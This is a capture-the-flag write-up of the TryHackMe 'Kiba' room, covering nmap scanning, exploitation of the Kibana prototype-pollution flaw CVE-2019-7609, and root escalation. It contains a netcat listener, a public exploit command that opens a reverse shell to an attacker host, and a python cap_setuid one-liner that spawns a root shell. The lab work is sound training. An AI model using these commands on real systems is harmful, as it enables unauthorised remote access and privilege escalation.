This is a write-up for Kiba room from TryHackMe. This room can be found here:-
Room Description: Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.
#1 What is the vulnerability that is specific to programming languages with prototype-based inheritance?
Check out the following link which describes this issue in details and will also give the answer:
#2 What is the version of visualization dashboard installed in the server?
Lets first enumerate the box using NMAP to find out all the open ports with the command:
sudo nmap -sS -Pn -T4 -p- 10.10.125.142
Lets find out what is running on these open ports using the command:
sudo nmap -O -A -Pn -T4 -p22,80,5044,5601 10.10.125.142
The most interesting thing that comes out of this NMAP scan is kibana running on port 5601 which is open source data visualization dashboard for Elasticsearch.
Open this in a browser and look around and we will get the version which we are looking for.
#3 What is the CVE number for this vulnerability? This will be in the format: CVE-0000–0000
Now we have the application name Kibana and a version, if we search we will find the CVE. The details can also be found Answer #1
#4 Compromise the machine and locate user.txt
Lets exploit the CVE and gets reverse shell. I have used an already published exploit available here:-
First open up a netcat listen from the attacking machine using:
nc -nlvp 9999
and run the exploit as
python CVE-2019-7609-kibana-rce.py -u http://10.10.41.246:5601 -host 10.10.10.10 -port 9999 --shell
We will get the reverse shell and the user flag:
#5 Capabilities is a concept that provides a security system that allows “divide” root privileges into different values
Nice to know and no answer needed.
#6 How would you recursively list all of these capabilities?
getcap -r /
#7 Escalate privileges and obtain root.txt
Use the above command to find capabilities which can be abused and we will find:
python3 in /home/kiba/.hackmeplease directory have cap_setuid set which can be abused to get root privileges using:
/home/kiba/.hackmeplease/python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
and the root flag at /root/root.txt:
Submit the flag and get the points :) See you next time.
Originally published at https://basicpentesting.blogspot.com on August 29, 2020.